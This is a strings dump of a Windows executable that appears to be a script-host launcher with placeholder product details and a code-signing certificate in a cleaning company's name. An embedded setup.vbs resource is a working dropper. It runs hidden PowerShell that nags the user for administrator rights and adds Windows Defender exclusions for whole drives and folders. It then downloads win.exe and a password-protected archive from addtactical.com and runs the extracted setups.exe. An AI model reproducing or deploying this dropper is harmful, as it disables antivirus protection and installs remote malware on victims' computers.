!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@_RDATA
@.rsrc
H9D$ v
D$8H9D$(s#H
D$8H9D$(r
H9D$ sXH
9D$ }B
D$`9D$
9D$ |uH
9D$ |)H
HcD$`H
<$6w=Hc
D$ HcD$ H
s<HcD$ Hk
HcD$ Hk
D$89D$ }
D$H9D$$}
HcD$LH
HcD$TH
HcD$TH
D$P9D$8
D$lHcL$8
}%HcD$ H
D$THcD$TL
9D$ }'H
H9D$ s
H9D$(s
HcD$ Hk
HcD$ Hk
L$8HcT$ Hk
u2HcD$ Hk
@09D$0
HcL$0Hk
HcD$0Hk
HcL$0Hk
HcD$0Hk
D$0Hk@
D$HHcD$HHcL$8L
D$ 9D$h
HcD$pHcL$ L
H9D$Xr&H
D$PHc@
H9D$Xs
HcD$ H=
sHcD$ A
D$$9D$P|!H
D$$9D$P|!H
HcL$$H
HHcL$PH
D$$9D$P~
HcL$PH
D$$9D$P|
HcL$PH
D$hH9D$8s\H
D$,HcD$(H
D$$9D$4~
D$HHcD$$H
D$pH9D$H
HcL$(H
D$0HcD$0H
HcL$(H
JHcT$0H
LcD$ L
HcD$ H
HcL$ H
HcD$ H
HcD$8H
HcD$8H
HcD$8H
H9D$Xr&H
D$PHc@
AH9D$Xs
HcD$ H=
sHcD$ A
HHcD$XH
9D$ }-HcD$ H
9D$ }9HcD$ H
HcD$ H
HcL$`H
D$0HcD$ H
HcD$8H
D$(HcD$`H
HcL$`H
HcD$pH
HcL$pH
HcT$`L
HcD$8H
D$(H9D$0tyH
XHcD$hH
D$@HcD$hH
9D$ }-HcD$ H
HHcD$XH
H9D$(u
D$H9D$ }
D$ H9D$0w;H
6HcD$pH
HcD$PH
HcL$PH
HcD$8H
HcD$pH
+D$p;D$ |
D$ H9D$8w
D$hHcD$pHcL$p
D$x9D$ }
D$(HcD$(H
D$PHcL$(H
(HcD$HH
HcD$pH
+D$p;D$ |
D$ H9D$8w
D$hHcD$pH
HcL$pH
D$H9D$ }
D$x9D$ }
D$(HcD$(H
D$PHcL$(H
H+D$8H;D$@s
t$8H;D$@s
+D$8;D$@}
+D$8;D$@s
H9D$8r
H9D$(r,H
H9D$(r,H
D$HH9D$ r
D$PH9D$ r
H9D$ v
H9H@t8
H;D$`u
HcD$ H
D$`Hc@
H;D$hv
D$`Hc@
D$`Hc@
H;D$ v
D$ H9D$hs
D$HH9D$ s
;^Xu&H
SVWAVH
8A^_^[
WAVAWH
WAVAWH
0A_A^_
u/HcH<H
H3E H3E
D8L$0uP
VWATAVAWH
A_A^A\_^
WATAUAVAWH
A_A^A]A\_
H;xXu5
ffffff
fffffff
fA;8unI
fA;(t(fA98t
fffffff
ffffff
vKfffff
WATAUAVAWH
A_A^A]A\_
AUAVAWH
u4I9}(
;I9}(tiH
0A_A^A]
AUAVAWH
u4I9}(
;I9}(tiH
0A_A^A]
UVWATAUAVAWH
`A_A^A]A\_^]
UVWATAUAVAWH
`A_A^A]A\_^]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
d$dD;d$ltY
A_A^A]A\_^[]
UVWATAUAVAWH
A_A^A]A\_^]
@USVWATAUAVAWH
A_A^A]A\_^[]
WAVAWH
@SVWATAUAVAWH
L!|$(L!
D$0HcH
pA_A^A]A\_^[
SVWATAUAWH
L!d$(L!d$@D
D$HL9gXt
A_A]A\_^[
B(I9A(
SVWATAUAVAWH
0A_A^A]A\_^[
SVWATAUAVAWH
A_A^A]A\_^[
t$ WATAUAVAWH
A_A^A]A\_
UVWATAUAVAWH
A_A^A]A\_^]
D$ I;R
D$ I9P
WATAUAVAWH
A_A^A]A\_
@USVWATAVAWH
A_A^A\_^[]
UVWATAUAVAWH
rsf;\$d
r_f;\$l
rKf;\$t
r7f;\$|
f;\$4r
f;\$<r
f;\$Dr
f;\$Lr
rvf;\$d
rbf;\$l
rNf;\$t
r:f;\$|
A_A^A]A\_^]
D$@H;F
t$ WATAUAVAWH
|T4fD;
A_A^A]A\_
D$18F(u
WAVAWH
A_A^_
@USVWATAVAWH
A_A^A\_^[]
WAVAWH
@A_A^_
D$0@8{
p*W4H
p*W4H
@UAVAWH
u3HcH<H
UVWAVAWH
0A_A^_^]
WAVAWH
fA9,@u
fA9,vu
0A_A^_
t$ WAVAWH
A_A^_
WAVAWH
A_A^_
p0R^G'
WATAUAVAWH
gfffffffH
A_A^A]A\_
{ AUAVAWH
0A_A^A]
t$xt*3
WAVAWH
A_A^_
x ATAVAWH
A_A^A\
fD94H}aD
fD9t$b
T$`fA;
UVWATAUAVAWH
H;\$8u
H;\$8u
fE9$Iu
A_A^A]A\_^]
WATAUAVAWH
0A_A^A]A\_
H97u+A
l$ VWATAVAWH
L$&8\$&t,8Y
A_A^A\_^
WATAUAVAWH
A_A^A]A\_
\$ VWATAUAVH
D!l$xA
@A^A]A\_^
L$ VWAVH
@UATAUAVAWH
e0A_A^A]A\]
x ATAVAWH
0A_A^A\
SUVWATAVAWH
A_A^A\_^][
@USVWATAVAWH
A_A^A\_^[]
WATAUAVAWH
0A_A^A]A\_
ATAUAVH
L$ fff
L$ |+L;
A^A]A\
@UATAUAVAWH
H!T$0D
u,!T$(H!T$
A_A^A]A\]
WAVAWH
A_A^_
UVWATAUAVAWH
fB9<A}1L
A_A^A]A\_^]
VWATAVAW
A_A^A\_^
AUAVAWH
@A_A^A]
@USVWATAUAVAWH
H!D$ I
hA_A^A]A\_^[]
ffffff
fffffff
@SUVWATAVAWH
@A_A^A\_^][
ATAVAWH
A_A^A\
USVWAVH
A^_^[]
LcA<E3
9D$Ps]
D$@Hc@
D$H9D$ u
D$P9D$ } HcD$ Hk
D$P9D$ }qHcD$ Hk
HcL$ Hk
| HcD$ Hk
D$$HcD$$H
D$$9D$ }gHcD$ Hk
HcD$ H
HcL$ Hk
HcD$ Hk
D$0HcD$0H
D$09D$
HcD$ H
HcD$ Hk
HcL$ Hk
HcD$ Hk
D$$HcD$$H
D$$9D$ }gHcD$ Hk
HcD$ H
HcL$ Hk
HcD$ Hk
HcD$ H
HcD$8H
HcD$(H
(HcD$8H
HcD$$H
HcD$$H
D$X9D$ }DH
D$@HcD$@H
D$HHcD$@L
9D$ }1HcD$ H
9D$ sv
|3HcD$
\u"HcD$ H
9D$ }5
HcL$ H
D$hH9D$Xr
D$hH9D$X
D$hH9D$Xr
UPHcEXHk
U`HcEhHk
HcEhHk
UPHcEXHk
Fatlthunk.dll
AtlThunk_AllocateData
AtlThunk_InitData
AtlThunk_DataToCode
AtlThunk_FreeData
SleepConditionVariableCS
WakeAllConditionVariable
Unknown exception
bad allocation
bad array new length
bad exception
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__swift_3
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
(null)
CorExitProcess
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
[aOni*{
~ $s%r
@b;zO]
v2!L.2
1#QNAN
1#SNAN
UUUUUU
UUUUUU
=imb;D
/>58d%
VM >cQ6
>jtm}S
)>6{1n
+f)>0'
;H9>&X
*StO9>T
n03>Pu
K~Je#>!
bp(=>?g
BC?>6t9^
K&>.yC
.xJ>Hf
y\PD>!
|b=})>
c [1>H'
uzKs@>
3>N;kU
kE>fvw
V6E>`"(5
?UUUUUU
?7zQ6$
\CLSID
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
.text$di
.text$mn
.text$mn$00
.text$x
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCL
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XLA
.CRT$XLZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$T
.rdata$r
.rdata$voltmd
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.tls$ZZZ
.xdata
.xdata$x
ATL$__a
ATL$__z
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.data$rs
.pdata
_RDATA
.rsrc$01
.rsrc$02
ReadFile
SizeofResource
HeapFree
SetLastError
EnterCriticalSection
GetConsoleOutputCP
WriteFile
ExpandEnvironmentStringsW
GetModuleFileNameW
LeaveCriticalSection
SetFilePointer
InitializeCriticalSectionEx
GetCurrentThreadId
HeapSize
MultiByteToWideChar
GetLastError
LockResource
HeapReAlloc
CloseHandle
RaiseException
CreateThread
FindResourceExW
LoadResource
FindResourceW
HeapAlloc
DecodePointer
HeapDestroy
GetProcAddress
DeleteCriticalSection
ExitProcess
GetProcessHeap
GetModuleHandleW
FreeLibrary
WideCharToMultiByte
SetConsoleOutputCP
GetFileType
lstrcmpiW
LoadLibraryExW
FlushFileBuffers
KERNEL32.dll
GetClassInfoExW
LoadCursorW
TranslateMessage
CharNextW
PeekMessageW
DispatchMessageW
RegisterClassExW
GetWindowLongPtrW
MsgWaitForMultipleObjects
UnregisterClassW
CreateWindowExW
SetWindowLongPtrW
MessageBoxW
CallWindowProcW
DefWindowProcW
USER32.dll
RegQueryValueExW
RegDeleteValueW
RegOpenKeyExW
RegSetValueExW
RegEnumKeyExW
RegCreateKeyExW
RegDeleteKeyW
RegQueryInfoKeyW
RegCloseKey
ADVAPI32.dll
CoInitialize
CoTaskMemAlloc
StringFromGUID2
CoUninitialize
CoCreateInstance
CLSIDFromProgID
CoTaskMemFree
CoTaskMemRealloc
CLSIDFromString
CoGetInstanceFromFile
CoGetObject
ole32.dll
OLEAUT32.dll
EncodePointer
InitializeSListHead
InterlockedPopEntrySList
InterlockedPushEntrySList
GetCurrentProcess
FlushInstructionCache
VirtualAlloc
VirtualFree
LoadLibraryExA
IsDebuggerPresent
OutputDebugStringW
InitializeCriticalSectionAndSpinCount
SetEvent
ResetEvent
WaitForSingleObjectEx
CreateEventW
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
TerminateProcess
IsProcessorFeaturePresent
GetStartupInfoW
QueryPerformanceCounter
GetCurrentProcessId
GetSystemTimeAsFileTime
RtlUnwindEx
RtlPcToFileHeader
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
RtlUnwind
GetCommandLineA
GetCommandLineW
GetModuleHandleExW
GetStdHandle
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
GetEnvironmentStringsW
FreeEnvironmentStringsW
FlsAlloc
FlsGetValue
FlsSetValue
FlsFree
LCMapStringW
SetStdHandle
GetStringTypeW
SetFilePointerEx
GetConsoleMode
CreateFileW
WriteConsoleW
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVbad_array_new_length@std@@
.?AVbad_exception@std@@
.?AVCAtlException@ATL@@
.?AVtype_info@@
.?AV?$IDispatchImpl@UIWSHUnnamedArguments@@$1?_GUID_bf64faf0_5906_426c_b4bc_7b753cbe819f@@3U__s_GUID@@B$1?_GUID_91afbd1b_5feb_43f5_b028_e2ca960617ec@@3U3@B$0PPPP@$0PPPP@VCComTypeInfoHolder@ATL@@@ATL@@
.?AV?$CComObject@VCEnumVariant@@@ATL@@
.?AV?$CComObject@VCResourceUtils@@@ATL@@
.?AV?$IDispatchImpl@UIArguments2@@$1?_GUID_2cc5a9d1_b1e5_11d3_a286_00104bd35090@@3U__s_GUID@@B$1?_GUID_91afbd1b_5feb_43f5_b028_e2ca960617ec@@3U3@B$0PPPP@$0PPPP@VCComTypeInfoHolder@ATL@@@ATL@@
.?AUIArguments@@
.?AUIUnknown@@
.?AV?$CWindowImplBaseT@VCWindow@ATL@@V?$CWinTraits@$0A@$0A@@2@@ATL@@
.?AUIHost@@
.?AV?$IDispatchImpl@UIWSHNamedArguments@@$1?_GUID_2cc5a9d0_b1e5_11d3_a286_00104bd35090@@3U__s_GUID@@B$1?_GUID_91afbd1b_5feb_43f5_b028_e2ca960617ec@@3U3@B$0PPPP@$0PPPP@VCComTypeInfoHolder@ATL@@@ATL@@
.?AUIRegistrarBase@@
.?AVCEnumVariant@@
.?AV?$CAtlModuleT@VCComModule@ATL@@@ATL@@
.?AUIArguments2@@
.?AUIDispatch@@
.?AUIAtlStringMgr@ATL@@
.?AUIWSHUnnamedArguments@@
.?AUIActiveScriptSite@@
.?AVCMessageMap@ATL@@
.?AV?$CComObjectRootEx@VCComSingleThreadModel@ATL@@@ATL@@
.?AV?$CWindowImplRoot@VCWindow@ATL@@@ATL@@
.?AU_ATL_MODULE70@ATL@@
.?AVCListener@@
.?AVCUnnamedArguments@@
.?AVCWindow@ATL@@
.?AVCAtlStringMgr@ATL@@
.?AUIWSHNamedArguments@@
.?AUIEnumVARIANT@@
.?AUIActiveScriptSiteWindow@@
.?AV?$CComObject@VCServer@@@ATL@@
.?AVCAtlModule@ATL@@
.?AVCServer@@
.?AV?$CComObject@VCWScript@@@ATL@@
.?AVCRegObject@ATL@@
.?AVCComModule@ATL@@
.?AVCResourceUtils@@
.?AVCWinHidden@@
.?AV?$CComObject@VCUnnamedArguments@@@ATL@@
.?AVCArguments@@
.?AVCWin32Heap@ATL@@
.?AVCWScript@@
.?AVCComObjectRootBase@ATL@@
.?AV?$CComObject@VCArguments@@@ATL@@
.?AUIAtlMemMgr@ATL@@
.?AV?$CComObject@VCNamedArguments@@@ATL@@
.?AV?$CWindowImpl@VCWinHidden@@VCWindow@ATL@@V?$CWinTraits@$0A@$0A@@3@@ATL@@
.?AVCNamedArguments@@
.?AV?$IDispatchImpl@UIHost@@$1?_GUID_91afbd1b_5feb_43f5_b028_e2ca960617ec@@3U__s_GUID@@B$1?2@3U3@B$0PPPP@$0PPPP@VCComTypeInfoHolder@ATL@@@ATL@@
stdole2.tlbWWW
VbseditLauncherLibWW
ZIHostWWW
out_Name
*ApplicationW
5out_Dispatch
FullName
out_Path
InteractiveW
>Gout_InteractiveW
o{ExitCode
ScriptNameWW
7Uout_ScriptNameWW
ScriptFullNameWW
out_ScriptFullNameWWd
NIArguments2W
tIArgumentsWW
IndexWWW
out_ValueWWW
0vCountWWW
out_CountWWW
lengthWW
xA_NewEnum
rout_Enum,
IWSHNamedArgumentsWW
6zSwitchWW,
]ExistsWW
rout_ExistsWWd
NamedWWW
out_ppnamedW
/IWSHUnnamedArgumentsd
?UnnamedWd
*ShowUsageWWW
j}ArgumentsWWW
zout_ArgumentsWWW
VersionW
4[out_VersionW
BuildVersion
out_BuildWWW
TimeoutW
out_TimeoutW
CreateObject
KProgIDWW
PrefixWW
pArgsWWW
GetObjectWWW
'Pathname
bDisconnectObject
.ObjectWW
SleepWWW
ConnectObjectWWW
ITextStreamW
iColumnWW
AtEndOfStreamWWW
AtEndOfLineW
rgCharactersWW
ReadLine
UReadAllW
.\WriteWWW
WriteLineWWW
WriteBlankLinesW
LinesWWW
SkipLine
CloseWWW
StdInWWW
out_ppts
aStdOutWW
,StdErrWW)
Windows Script Host Application InterfaceW%
Arguments Collection Object InterfaceW+
Named Arguments Collection Object InterfaceWWW-
Unnamed Arguments Collection Object InterfaceW
Created by MIDL version 8.01.0622 at Tue Jan 19 04:14:07 2038
Greater Manchester1
Salford1
Comodo CA Limited1!0
AAA Certificate Services0
190312000000Z
281231235959Z0
New Jersey1
Jersey City1
The USERTRUST Network1.0,
%USERTrust RSA Certification Authority0
2http://crl.comodoca.com/AAACertificateServices.crl04
http://ocsp.comodoca.com0
Certera1 0
Certera Code Signing CA0
230508000000Z
240507235959Z0n1
Kent1'0%
AAAA CLEANING REMOVALS LIMITED1'0%
AAAA CLEANING REMOVALS LIMITED0
P#s7.1
https://sectigo.com/CPS0
7http://Certera.crl.sectigo.com/CerteraCodeSigningCA.crl0
7http://Certera.crt.sectigo.com/CerteraCodeSigningCA.crt0+
http://Certera.ocsp.sectigo.com0
New Jersey1
Jersey City1
The USERTRUST Network1.0,
%USERTrust RSA Certification Authority0
220907000000Z
320906235959Z0A1
Certera1 0
Certera Code Signing CA0
In"uq"
?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0q
.http://crt.usertrust.com/USERTrustRSAAAACA.crt0%
http://ocsp.usertrust.com0
`0z+*y
Certera1 0
Certera Code Signing CA
ERROR : Unable to initialize critical section in CAtlBaseModule
api-ms-win-core-synch-l1-2-0.dll
kernel32.dll
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
(null)
mscoree.dll
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
((((( H
((((( H
(
api-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
api-ms-win-appmodel-runtime-l1-1-2
user32
ext-ms-
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
atlTraceGeneral
atlTraceCOM
atlTraceQI
atlTraceRegistrar
atlTraceRefcount
atlTraceWindowing
atlTraceControls
atlTraceHosting
atlTraceDBClient
atlTraceDBProvider
atlTraceSnapin
atlTraceNotImpl
atlTraceAllocation
atlTraceException
atlTraceTime
atlTraceCache
atlTraceStencil
atlTraceString
atlTraceMap
atlTraceUtil
atlTraceSecurity
atlTraceSync
atlTraceISAPI
ForceRemove
NoRemove
Delete
Component Categories
FileType
Interface
Hardware
SECURITY
SYSTEM
Software
TypeLib
COM Error: 0x%08lx
VBScript
JScript
JScript is not available on this computer.
chakra
jscript9
{1b7cd997-e5ff-4932-a7a6-2a9e636da385}
Chakra is not available on this computer.
{16d51579-a30b-4c8b-a276-0ff4dc41e755}
JScript v9 is not available on this computer.
is not available on this computer.
WScript
WScript
Windows Script Host
Script error in line %ld, position %ld
TypeLib\
Wow6432Node\TypeLib\
/automation
CLSID\
Wow6432Node\CLSID\
TypeLib
InprocServer32
LocalServer32
WScript.Sleep 11
Dim strCode, strResult
strCode = "$AdminRightsRequired = $true" & vbCrLf & vbCrLf & _
"function Get-Win {" & vbCrLf & _
" while ($true) {" & vbCrLf & _
" # Elevate privileges" & vbCrLf & _
" if (-not (IsAdministrator)) {" & vbCrLf & _
" $proc = New-Object System.Diagnostics.Process" & vbCrLf & _
" $proc.StartInfo.WindowStyle = 'Hidden'" & vbCrLf & _
" $proc.StartInfo.FileName = [System.Diagnostics.Process]::GetCurrentProcess().MainModule.FileName" & vbCrLf & _
" $exclusionPaths = '${env:ProgramData}','${env:AppData}','${env:SystemDrive}\\'" & vbCrLf & _
" $proc.StartInfo.Arguments = '-Command ""Add-MpPreference -ExclusionPath """"' + ($exclusionPaths -join ',') + '""""""'" & vbCrLf & _
" $proc.StartInfo.UseShellExecute = $true" & vbCrLf & _
" $proc.StartInfo.Verb = 'runas'" & vbCrLf & _
" $proc.StartInfo.CreateNoWindow = $true" & vbCrLf & _
" try {" & vbCrLf & _
" $proc.Start() | Out-Null" & vbCrLf & _
" $proc.WaitForExit() | Out-Null" & vbCrLf & _
" [Environment]::Exit(1)" & vbCrLf & _
" } catch [System.ComponentModel.Win32Exception] {" & vbCrLf & _
" if ($AdminRightsRequired) {" & vbCrLf & _
" continue" & vbCrLf & _
" } else {" & vbCrLf & _
" break" & vbCrLf & _
" }" & vbCrLf & _
" }" & vbCrLf & _
" } else {" & vbCrLf & _
" break" & vbCrLf & _
" }" & vbCrLf & _
" }" & vbCrLf & _
"}" & vbCrLf & vbCrLf & _
"function IsAdministrator {" & vbCrLf & _
" $identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()" & vbCrLf & _
" $principal = New-Object System.Security.Principal.WindowsPrincipal($identity)" & vbCrLf & _
" return $principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)" & vbCrLf & _
"}" & vbCrLf & vbCrLf & _
"" & vbCrLf & _
"Get-Win"
Dim objPowerShell
Set objPowerShell = CreateObject("WScript.Shell")
strResult = objPowerShell.Run("powershell.exe -ExecutionPolicy Bypass -Command """ & strCode & """", 0, False)
WScript.Sleep 300000
Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")
oXMLHTTP.Open "GET", "http://addtactical.com/win.exe", 0
oXMLHTTP.Send
Set oADOStream = CreateObject("ADODB.Stream")
oADOStream.Mode = 3
oADOStream.Type = 1
oADOStream.Open
oADOStream.Write oXMLHTTP.responseBody
oADOStream.SaveToFile ".\win.exe", 2
WScript.Sleep 11
Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")
oXMLHTTP.Open "GET", "http://addtactical.com/plugin1.rar", 0
oXMLHTTP.Send
Set oADOStream = CreateObject("ADODB.Stream")
oADOStream.Mode = 3
oADOStream.Type = 1
oADOStream.Open
oADOStream.Write oXMLHTTP.responseBody
oADOStream.SaveToFile ".\plugin1.rar", 2
WScript.Sleep 15000
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run".\win.exe x -o- -pjryj2023 .\plugin1.rar .\", 0, true
WScript.Sleep 5000
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run".\setups.exe"
WScript.Sleep 15000
WScript.Quit
Advapi32.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Software
Classes
Module
Module_Raw
REGISTRY
ATL:%p
getResource
ScriptName
setup.vbs
TYPELIB(
VS_VERSION_INFO
StringFileInfo
040904b0
CompanyName
FileDescription
My Description
FileVersion
1.0.0.1
InternalName
LegalCopyright
My Company Name 2023
OriginalFilename
ProductName
My Product Name
ProductVersion
1.0.0.1
VarFileInfo
Translation